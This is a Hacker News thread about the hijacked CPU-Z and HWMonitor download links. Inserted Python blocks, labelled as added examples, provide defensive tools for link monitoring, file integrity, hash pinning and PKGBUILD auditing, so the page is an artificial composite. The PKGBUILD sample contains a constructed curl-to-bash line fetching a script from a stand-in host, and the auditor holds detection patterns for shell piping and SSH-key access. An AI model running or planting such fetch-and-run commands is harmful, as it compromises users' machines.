
CPU-Z and HWMonitor compromised

https://www.theregister.com/2026/04/10/cpuid_site_hijacked/
96•pashadee•4h ago
https://xcancel.com/vxunderground/status/2042483067655262461

https://old.reddit.com/r/pcmasterrace/comments/1sh4e5l/warni...

https://www.bleepingcomputer.com/news/security/supply-chain-...

Comments

kevincloudsec•3h ago
same threat group hit filezilla last month. they're specifically targeting utilities that tech-savvy users trust and download from official sources. the attack surface is the api layer that generates download links, not the binary itself
kevincloudsec•3h ago
same threat group hit filezilla last month with a fake domain. this time they didn't even need a fake domain, they compromised the real one's api layer. the attack is evolving from 'trick users into visiting the wrong site' to 'make the right site serve the wrong file.'
cachius•3h ago
This is bad. I like to install software with winget. Are the versions there also compromised?

v1.63 updated 6 days ago https://github.com/microsoft/winget-pkgs/tree/master/manifes... via https://winstall.app/apps/CPUID.HWMonitor

v2.19 updated 15 days ago https://github.com/microsoft/winget-pkgs/tree/master/manifes... via https://winstall.app/apps/CPUID.CPU-Z

cachius•2h ago
It's HWMonitor https://www.cpuid.com/softwares/hwmonitor.html and not HWInfo https://www.hwinfo.com/

So two programs from CPUID. I wonder if there are more affected.

Same topic on Reddit at https://news.ycombinator.com/item?id=47718830 @dang

wang_li•2h ago
Jesus. I see that post and comment section and I immediately expect to hear Joey telling me about how this ATM in Idaho started spraying cash after his hack of the Gibson. That is a real-life reproduction of the perception of hackers in films in the '90s.
metalliqaz•2h ago
someone has some l33t sk1llz
vntok•2h ago
From the thread:

> Q: Why the heck did you hyperlink [the malware installer]?

> A: If someone reads this and they still click the download then they kind of deserve the virus tbh

daneel_w•3m ago
And CSI: Miami, which kept the vibe alive through the 2000s and "educated the masses" on how IT works. Beep boop, I'm in.
orthogonal_cube•2h ago
Seems the installers hosted by them are fine. The links on the site have been changed to direct people towards Cloudflare R2 storage with various copies of malicious executables.

Looking forward to information down the line on how this came about.

1970-01-01•1h ago
Not exactly a supply chain compromise, as devs should be smart enough to update via a package manager such as winget and chocolatey, but it certainly fits for a watering hole attack.
Terr_•26m ago
I suppose one could view it as a supply-chain compromise of an alternate chain that's very short.
john_strinlai•2h ago
some comments purportedly (i did not verify) from one of the maintainers:

>Dear All, I'm Sam and I'm working with Franck on CPU-Z (I'm doing the validator). Franck is unfortunately OOO for a couple of weeks. I'm just out of bed after working on Memtest86+ for most of the night, so I'm doing my best to check everything. As very first checks, the file on our server looks fine (https://www.virustotal.com/gui/file/6c8faba4768754c3364e7c40...) and the server doesn't seem compromised. I'm investigating further... If anyone can tell me the exact link to the page where the malware was downloaded, that would help a lot

>Thank you. I found the biggest breach, restored the links and put everything in read-only until more investigation is done. Seems they waited until Franck was off and I got to bed after working on Memtest86+ yesterday :-/

>The links have been compromised for a bit more than 6 hours between 09/04 and 10/04 GMT :-/

so, it appears that the cpuid website was compromised, with links leading to fake installers.
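
The incident as described in the thread (files on the server intact, download links rewritten to point at third-party object storage) is exactly the case a static-file hash check misses, so a download-page monitor has to look at where the links go. The following is an added example, not anything from CPUID or the commenters; the vendor hostnames, the allowed-host list and the HTML snippet are constructed for the demonstration (the `r2.dev` host is a made-up bucket name standing in for the Cloudflare R2 links mentioned above).

```python
"""Download-link monitor: alert when a vendor's download page starts linking off-site.

Added example (Python stdlib only). Hostnames and the sample page are constructed;
the real CPUID site layout is not assumed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Hypothetical vendor page and the hosts its installers are legitimately served from.
PAGE_URL = "https://www.example-vendor.test/softwares/cpu-z.html"
ALLOWED_DOWNLOAD_HOSTS = {"www.example-vendor.test", "download.example-vendor.test"}
INSTALLER_SUFFIXES = (".exe", ".msi", ".zip", ".dmg", ".pkg")


class LinkExtractor(HTMLParser):
    """Collect (href, visible link text) pairs from every <a> tag."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self._current = [href, ""]

    def handle_data(self, data):
        if self._current is not None:
            self._current[1] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self.links.append((self._current[0], self._current[1].strip()))
            self._current = None


def audit_download_links(page_html, page_url=PAGE_URL, allowed_hosts=ALLOWED_DOWNLOAD_HOSTS):
    """Return findings (absolute_url, link_text, reason) for download links that leave allowed hosts."""
    parser = LinkExtractor()
    parser.feed(page_html)
    findings = []
    for href, text in parser.links:
        url = urljoin(page_url, href)          # resolve relative hrefs against the page
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https"):
            continue                            # mailto:, javascript: etc. are not downloads
        host = parts.hostname or ""
        if host in allowed_hosts:
            continue
        if parts.path.lower().endswith(INSTALLER_SUFFIXES):
            findings.append((url, text, "installer link points off-site to %s" % host))
        elif "download" in text.lower():
            findings.append((url, text, "download button points off-site to %s" % host))
    return findings


# Constructed sample of a tampered page: the markup is untouched except that two
# installer hrefs now point at a public object-storage bucket instead of the vendor host.
SAMPLE_PAGE = """
<html><body>
<h1>CPU-Z 2.19</h1>
<a href="/softwares/cpu-z/versions-history.html">Version history</a>
<a href="https://download.example-vendor.test/cpu-z_2.19-en.exe">SETUP - ENGLISH</a>
<a href="https://pub-0123456789abcdef.r2.dev/cpu-z_2.19-en.exe">SETUP - ENGLISH (mirror)</a>
<a href="https://pub-0123456789abcdef.r2.dev/cpu-z_2.19-en.zip">ZIP - ENGLISH</a>
<a href="mailto:support@example-vendor.test">Contact</a>
</body></html>
"""

if __name__ == "__main__":
    for url, text, reason in audit_download_links(SAMPLE_PAGE):
        print("ALERT: %s [%s]: %s" % (text, url, reason))
```

Run it from a cron job against the live page (fetch with whatever HTTP client you like and pass the body in) and page someone on any finding. If the links are generated by an API rather than static HTML, point the same check at the API response instead; the property being monitored is the set of hosts the download buttons resolve to, not the bytes of any file.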

BoredPositron•2h ago
It's the third time that I've read something about availability notifications on discord and other chats getting abused for timed attacks in the last few weeks.
magicalhippo•1h ago
After my Wordpress site got hacked way back through an exploit in one of the WP files, I set up a cron job that compared the hash of the static files with the expected hash, and would fire off an email if they differed.

The script lived above the web root, so they'd have to escape that to tamper with it, and was generated by another script.

Saved me a couple of times since, well worth the 15 minutes I spent on setting it up.

embedding-shape•1h ago
> Saved me a couple of times since

Wait, how often does your Wordpress site get successfully hacked like that?

magicalhippo•1h ago
Keep in mind the first time was about 20 years ago.

One time the hosting provider got compromised, FTP server exploit IIRC, they ran a recursive search and replace from the root directory of the server.

michaelt•31m ago
Back in the 1990s, there was a tool called ‘tripwire’ that checked key files against expected checksums.

As I recall, they recommended putting the expected values on a floppy disk and setting the ‘write protect’ tab, so the checksums couldn’t be changed.

Terr_•27m ago
Back in the 90s I fantasized about a hard drive bay with a physical write-protect switch on the cover plate.
FuriouslyAdrift•12m ago
tripwire was the original file integrity anti-virus/anti-tampering software from the security group (which turned into CERIAS) at Purdue led by Dr. Eugene "Spaff" Spafford.

https://docs.lib.purdue.edu/cstech/1084/

daneel_w•6m ago
Related: OpenBSD does this daily as part of running security(8) and its coverage can be expanded to include pretty much anything.

https://man.openbsd.org/security
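
The cron-job hash check described by magicalhippo above and the tripwire/security(8) approach in the replies are the same technique: record a baseline of file digests, keep it where the web server cannot write, and diff against it on a schedule. The block below is an added example written from scratch for this thread (it is not magicalhippo's script, tripwire, or OpenBSD's security(8)); the tiny site it baselines and tampers with is constructed inside a temporary directory so it runs anywhere.

```python
"""Tripwire-style integrity check for a web root.

Added example (Python stdlib only). Baseline every file under the web root, store the
baseline outside the web root (ideally on read-only or off-host storage, which this
script cannot enforce by itself), and diff the live tree against it on a schedule."""
import hashlib
import json
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file, streamed so large assets need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, skip_suffixes=(".log",)):
    """Walk root and return {relative_path: sha256} for every regular, non-symlink file."""
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic order keeps the stored baseline diff-friendly
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if name.endswith(skip_suffixes) or os.path.islink(full) or not os.path.isfile(full):
                continue
            baseline[os.path.relpath(full, root)] = hash_file(full)
    return baseline


def compare(baseline, current):
    """Classify differences as added, removed or modified (each a sorted list of paths)."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p]),
    }


def check(root, baseline_path):
    """Load the stored baseline and diff the live tree against it; all-empty lists mean clean."""
    with open(baseline_path) as f:
        return compare(json.load(f), build_baseline(root))


def _write(path, text):
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Constructed scenario: baseline a tiny site in a temp dir, tamper with it, detect."""
    tmp = tempfile.mkdtemp()
    webroot = os.path.join(tmp, "htdocs")
    os.makedirs(os.path.join(webroot, "js"))
    _write(os.path.join(webroot, "index.html"), "<a href='/dl/setup.exe'>Download</a>")
    _write(os.path.join(webroot, "js", "app.js"), "console.log('ok');")
    _write(os.path.join(webroot, "access.log"), "noise")  # skipped by suffix, logs churn

    # Baseline lives one level above the web root, as in the comment above.
    baseline_path = os.path.join(tmp, "baseline.json")
    with open(baseline_path, "w") as f:
        json.dump(build_baseline(webroot), f, indent=1)

    # Simulated tampering: download link rewritten to a foreign host, one file dropped.
    _write(os.path.join(webroot, "index.html"), "<a href='https://evil.invalid/setup.exe'>Download</a>")
    _write(os.path.join(webroot, "dropped.php"), "<?php /* constructed placeholder */ ?>")
    return check(webroot, baseline_path)


if __name__ == "__main__":
    diff = demo()
    if any(diff.values()):
        print("INTEGRITY ALERT:", json.dumps(diff, indent=1))  # this is where the email goes out
    else:
        print("clean")
```

Two caveats a practitioner would add: an attacker who gets root on the host can rewrite both the tree and the baseline, which is why the tripwire advice was write-protected removable media and why the check is better run from a second machine against a copy of the tree; and a hash baseline says nothing about content that is generated at request time (database-driven download links, for instance), so it complements rather than replaces a check on what the live page actually serves.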

cwizou•11m ago
For what it's worth - I used to write CPU reviews a while back - I can vouch for both Sam and Franck. Franck is the guy behind CPUID and Sam is a close friend of his, who was known for working at Canard PC on top of his work on Memtest : https://x86.fr/about-me/
john_strinlai•5m ago
that is pretty cool!

when I say I didn't verify, I just mean that I ripped these quotes out of Reddit, and did not check whether the Reddit username that posted the comments is known to be an identity of Sam.

amatecha•2h ago
some good details here https://xcancel.com/vxunderground/status/2042483067655262461
kyrra•2h ago
For windows users, this is an advantage of using `winget` for installing things. It points to the installer hosted elsewhere, but it at least does a signature check. The config for the latest installer is listed here: https://github.com/microsoft/winget-pkgs/blob/master/manifes...

which you can install with:

   winget install --exact --id CPUID.CPU-Z
(there is a --version flag where you can specify "2.19"; the signature there is a month old, so it should be safe to install that way)
ww520•2h ago
Yes. Winget is getting better support on Windows apps. The other day I tried to download the latest version of ImageMagick but all the links on the official site were bad. I tried Winget and it had it!
eviks•2h ago
This manifest only shows sha checks, which wouldn't help if the manifest is updated during the site compromise. How does it do the signature check?
actionfromafar•1h ago
Presumably the manifest is in github and won't auto-update when something on the CPU-Z website changes?
eviks•1h ago
What do you mean, how would it get the new version name/hash if not following the changes on the website?
kyrra•1h ago
I think you should spend the 5 minutes it takes to look at the winget-pkg repo to see how it works. There's lots of great documentation.

All updates are manual, and are done via pull requests. Check everything in-queue: https://github.com/microsoft/winget-pkgs/pulls

Existing versions don't tend to have their metadata updated (I'm not sure winget would accept it). Only new versions are supported.

You can see all the checks that go into cpu-z updates with the latest PR: https://github.com/microsoft/winget-pkgs/pull/349095

eviks•57m ago
That would obviously be longer than 5 minutes; presumably you've done that and still can't answer the simple question

> All updates are manual, and are done via pull requests.

The pull requests can be and some are automated, so not all are manual. But more importantly, how would it help?

> Existing versions don't tend to have their metadata updated (I'm not sure winget would accept it). Only new versions are supported.

The attack is version update! How is the old manifest version relevant here?

> You can see all the checks that go into cpu-z updates with the latest PR:

> Description : Invoke an Azure Function > Static Analysis > Status: Started > Status: InProgress

Excellent, now how can I get the answer to the question from this valuable information?
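
The disagreement above comes down to what a pinned InstallerSha256 actually proves, and that is easy to show in code. The block below is an added example, not winget's implementation; it reuses only the field names a winget installer manifest carries (InstallerUrl, InstallerSha256), while the package identifier, URL and installer bytes are constructed stand-ins. It plays out the two timelines the thread argues about: a manifest pinned before the hijack, and a manifest authored (by a human or a bot PR) from a download made while the links were compromised.

```python
"""What a hash-pinned manifest (winget-style) does and does not catch.

Added example, stdlib only; not winget's own code. The manifest fragment is constructed
and uses winget's InstallerUrl / InstallerSha256 field names; everything else is made up."""
import hashlib

MANIFEST_TEMPLATE = """\
PackageIdentifier: Example.Tool
PackageVersion: 2.19
Installers:
- Architecture: x64
  InstallerType: exe
  InstallerUrl: https://download.example-vendor.test/tool_2.19-en.exe
  InstallerSha256: {sha}
ManifestType: installer
"""

# Constructed stand-ins for installer bytes (real ones are megabytes of PE file).
GENUINE_INSTALLER = b"MZ genuine installer built by the vendor (constructed)"
SWAPPED_INSTALLER = b"MZ malicious installer served during the compromise (constructed)"


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest().upper()


def parse_installer_fields(manifest_text):
    """Minimal reader for the flat `Key: value` lines of the fragment (deliberately not a YAML parser)."""
    fields = {}
    for raw in manifest_text.splitlines():
        line = raw.strip().lstrip("- ").strip()
        key, sep, value = line.partition(":")
        if sep and value.strip():
            fields[key.strip()] = value.strip()
    return fields


def pinned_verify(manifest_text, downloaded):
    """The client-side check: accept only if sha256(download) equals the pinned InstallerSha256."""
    pinned = parse_installer_fields(manifest_text)["InstallerSha256"].upper()
    return sha256_hex(downloaded) == pinned


def author_manifest(installer_bytes):
    """What a manifest author (human or bot) does: download once, hash it, pin that hash."""
    return MANIFEST_TEMPLATE.format(sha=sha256_hex(installer_bytes))


def scenarios():
    """Two timelines for the same link hijack; True means the install was blocked."""
    # 1. Manifest authored from the genuine file before the compromise. During the hijack the
    #    download hands back different bytes; the pin does not match and the client refuses.
    old_manifest = author_manifest(GENUINE_INSTALLER)
    blocked_swap = not pinned_verify(old_manifest, SWAPPED_INSTALLER)

    # 2. A new version's manifest is authored while the site is serving the malicious file.
    #    The pin now matches the malware: the hash only proves "same bytes the author saw".
    poisoned_manifest = author_manifest(SWAPPED_INSTALLER)
    blocked_poisoned = not pinned_verify(poisoned_manifest, SWAPPED_INSTALLER)

    return {
        "swap_after_pin_blocked": blocked_swap,
        "manifest_authored_during_compromise_blocked": blocked_poisoned,
    }


if __name__ == "__main__":
    for name, blocked in scenarios().items():
        print("%-48s %s" % (name, "BLOCKED" if blocked else "INSTALLS"))
```

Scenario 1 is kyrra's point and it is real: a manifest that predates a short hijack (the 2.19 manifest is described above as fifteen days old, against a window of about six hours) rejects anything that is not the originally hashed bytes. Scenario 2 is eviks's point: a hash pin carries no authority of its own, so a manifest generated from a poisoned download pins the poison. Nothing in this block checks a code signature; whether the binary is Authenticode-signed by the expected publisher is a separate check that neither side of the thread has shown the manifest enforcing.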

hypeatei•1h ago
Package managers also saved people from the Notepad++ hijack that was disclosed a couple months ago.

I think devs should avoid distributing their software on first party sites unless they're willing to dedicate a bunch of time to making sure all the infra is secure. Not a lot of people verify signatures, but it's also good to have your PKI in order (signing keys should be available on multiple channels)

fuzzy2•1h ago
No, WinGet does not generally protect against this. While PRs to update package versions are verified in some way before going live, the necessary throughput can only be achieved with shallow checks. A determined actor could easily get a malicious update in, once they control the original source.

Other than that, WinGet is mostly just "run setup.exe". It is not a package manager. It's basically MajorGeeks as a mediocre CLI.

quantummagic•2h ago
> after the download my Windows Defender instantly detected a virus.

> (because I am often working with programs which trigger the defender, I just ignored that)

This again shows the unfortunate corrosive effect of false-positives. Probably impossible to solve while aggressively detecting viruses though.

pshirshov•1h ago
But sorta possible to solve with source-based distribution and totally possible to solve with pure reproducible builds.
daveguy•1h ago
What systems have pure reproducible builds? Does Nix? Any others? From what I understand, it is a very difficult problem.
pshirshov•1h ago
https://stal-ix.github.io/ and Guix, but the definitions of purity are different for them.

Yes, a very difficult problem, compilers must be pure functions with thin effectful wrappers.

gertop•23m ago
It's entirely possible to ship malware in source form... Just look at the numerous supply chain attacks. Nix is a cute project but entirely irrelevant here.
eviks•1h ago
If only there were a great Windows app store or a package manager to help with the impossible...
unethical_ban•2h ago
I've wondered about this while using CachyOS and their package installer. I don't know what repos do what, I don't really understand the security model of the AUR, and I wonder, if I download a package, how can I know it's legitimate or otherwise by some trusted user of the community vs. some random person?
cephi•2h ago
To provide some quick information (I implore others to correct me here):

- CachyOS packages should be coming from known, trusted CachyOS and Arch Linux maintainers. There is still potential for them or their original packages to get compromised (See XZ backdoor) however they are pulling source code from trusted sources so you can generally trust these as much as you trust the OS itself.

- AUR packages are a complete wild west. AUR packages are defined by PKGBUILD files and I highly recommend learning how to read PKGBUILDs and always reading them before installation and re-reading them when they are updated. PKGBUILDs for AUR packages can be treated as untrusted shell scripts and to a certain extent an arbitrary actor can make and upload any PKGBUILD to the AUR. Feel free to use them, but make sure A) they are downloading from trusted sources like the original git repo and B) they are running commands that are expected.

EDIT: Improved accuracy.
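
The two things cephi says to check in an AUR PKGBUILD, where the sources come from and what the build functions run, can be mechanised as a first pass before you read the file yourself. The block below is an added example, not an Arch or AUR tool; the trusted-host list is a placeholder you would tune, the suspicious-pattern list is a heuristic starting point, and the PKGBUILD it scans is constructed to trip each check (an off-site helper script with a SKIP checksum and a `curl | bash` in prepare()).

```python
"""First-pass PKGBUILD audit: source hosts, checksum pins, and what the build runs.

Added example (Python stdlib only), not makepkg or any AUR helper. It does not replace
reading the PKGBUILD; it just surfaces the lines that deserve a close look."""
import re
from urllib.parse import urlsplit

# Placeholder allowlist; a real one lists the upstream hosts you have decided to trust.
TRUSTED_SOURCE_HOSTS = {"github.com", "gitlab.com", "files.pythonhosted.org", "download.example-vendor.test"}

# Heuristic red flags inside prepare()/build()/package()/pkgver() bodies.
SUSPICIOUS = [
    (re.compile(r"curl[^|\n]*\|\s*(ba)?sh\b"), "pipes a remote script into a shell"),
    (re.compile(r"wget[^|\n]*\|\s*(ba)?sh\b"), "pipes a remote script into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "decodes embedded base64 (common obfuscation)"),
    (re.compile(r"\beval\b"), "uses eval"),
    (re.compile(r"\$HOME/\.ssh|~/\.ssh|/\.gnupg"), "touches SSH/GPG directories"),
]


def bash_array(pkgbuild, name):
    """Elements of a simple `name=( ... )` bash array; quotes stripped, no nested parens."""
    m = re.search(r"(?m)^\s*" + re.escape(name) + r"=\((.*?)\)", pkgbuild, re.S)
    if not m:
        return []
    return [item.strip("'\"") for item in m.group(1).split()]


def function_body(pkgbuild, fn):
    """Body of `fn() { ... }` assuming the closing brace sits on its own line (makepkg style)."""
    m = re.search(r"\n" + fn + r"\(\)\s*\{(.*?)\n\}", pkgbuild, re.S)
    return m.group(1) if m else ""


def audit_pkgbuild(text, trusted_hosts=TRUSTED_SOURCE_HOSTS):
    """Return a list of human-readable findings; an empty list means nothing jumped out."""
    findings = []
    sources = bash_array(text, "source")
    sums = bash_array(text, "sha256sums") or bash_array(text, "b2sums")
    for i, item in enumerate(sources):
        url = item.split("::", 1)[-1]              # handle `localname::url` entries
        parts = urlsplit(url)
        if parts.scheme in ("http", "https", "git", "git+https"):
            host = parts.hostname or ""
            if host not in trusted_hosts:
                findings.append("source %d fetched from untrusted host %s" % (i, host))
        if i < len(sums) and sums[i].upper() == "SKIP":
            findings.append("source %d has checksum SKIP (no integrity pin)" % i)
    for fn in ("prepare", "build", "package", "pkgver"):
        body = function_body(text, fn)
        for pattern, why in SUSPICIOUS:
            if pattern.search(body):
                findings.append("%s(): %s" % (fn, why))
    return findings


# Constructed PKGBUILD that should trip three checks.
SAMPLE_PKGBUILD = r'''
pkgname=hwmon-tool-bin
pkgver=2.19
pkgrel=1
arch=('x86_64')
source=("https://download.example-vendor.test/hwmon-tool-${pkgver}.zip"
        "helper.sh::https://pub-0123456789abcdef.r2.dev/helper.sh")
sha256sums=('3b6f7a0a4d2d5f9f4d1e0c7b8a9e6f5d4c3b2a19087f6e5d4c3b2a1908f7e6d5'
            'SKIP')

prepare() {
  cd "$srcdir"
  curl -fsSL https://pub-0123456789abcdef.r2.dev/setup.sh | bash
}

package() {
  install -Dm755 "$srcdir/hwmon-tool" "$pkgdir/usr/bin/hwmon-tool"
}
'''

if __name__ == "__main__":
    for finding in audit_pkgbuild(SAMPLE_PKGBUILD):
        print("REVIEW:", finding)
```

The regexes are intentionally simple and will miss anything split across lines or hidden behind variables; treat a clean result as "nothing obvious", not as approval, and re-run it whenever the package bumps, since cephi's advice to re-read on every update is the part that actually catches a maintainer account takeover.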

cachius•2h ago
Grok post linking further sources: https://x.com/i/grok/share/3b870ceb9b424c01bf89afbe0de3bd81
jl6•2h ago
To our new generation of human shields willing to use software releases less than a month old, we salute your sacrifice.
mikestorrent•1h ago
Is there a tool out there that you can put software releases into and it will tell you how safe it is? I don't seem to be able to buy anything to do this. Crowdstrike and other modern antivirus may react to it once it's on a device, SAST / SCA tooling will help with CVEs, but there's nothing I can give my users where they can put in some piece of random software and get a reputation metric out the other side, is there?
Foobar8568•1h ago
Beside Virus Total, I am unsure https://www.virustotal.com/
mikestorrent•49m ago
Thanks, that's helpful
__natty__•1h ago
Not exactly for software (although there is such a section) but I use the end of life [0] website. Besides the time when certain software will be outdated, it also tells you their release time.

[0] https://endoflife.date/

seanw444•54m ago
You could put it into an LLM, since that's what we do for everything else nowadays.
vladvasiliu•38m ago
> put in some piece of random software and get a reputation metric out the other side

Well, the enterprise version of ms defender will not only react to it if it does something "weird", but will specifically look at its "reputation" before it runs at all.

However, as another commenter pointed out, this generates a ton of false positives. Basically everything that's "brand new" is liable to trigger it. Think your freshly compiled hello_world.exe. So, all in all, people may no longer pay attention to it and just click through all warnings.

sourcegrift•1h ago
Thank the web that produced CSS programmers who have been taught that latest is greatest and shiny gets money.
leptons•12m ago
"new, shiny" has never been a problem with CSS. Either browsers support some CSS attribute or they don't.

You're probably thinking about Javascript programmers.

layer8•18m ago
I’m not one to chase the new and shiny, but how do you know a nominally months-old software package isn’t a newly compromised version at the time you download it?
leptons•6m ago
I hope you don't think that waiting a month will protect you. Malicious software can wait to be triggered months or years before anything malicious happens.
BoredPositron•1h ago
"Bug fixes and general improvements."

Supply chain attacks are easier because changelogs for most software are useless now if they are provided at all.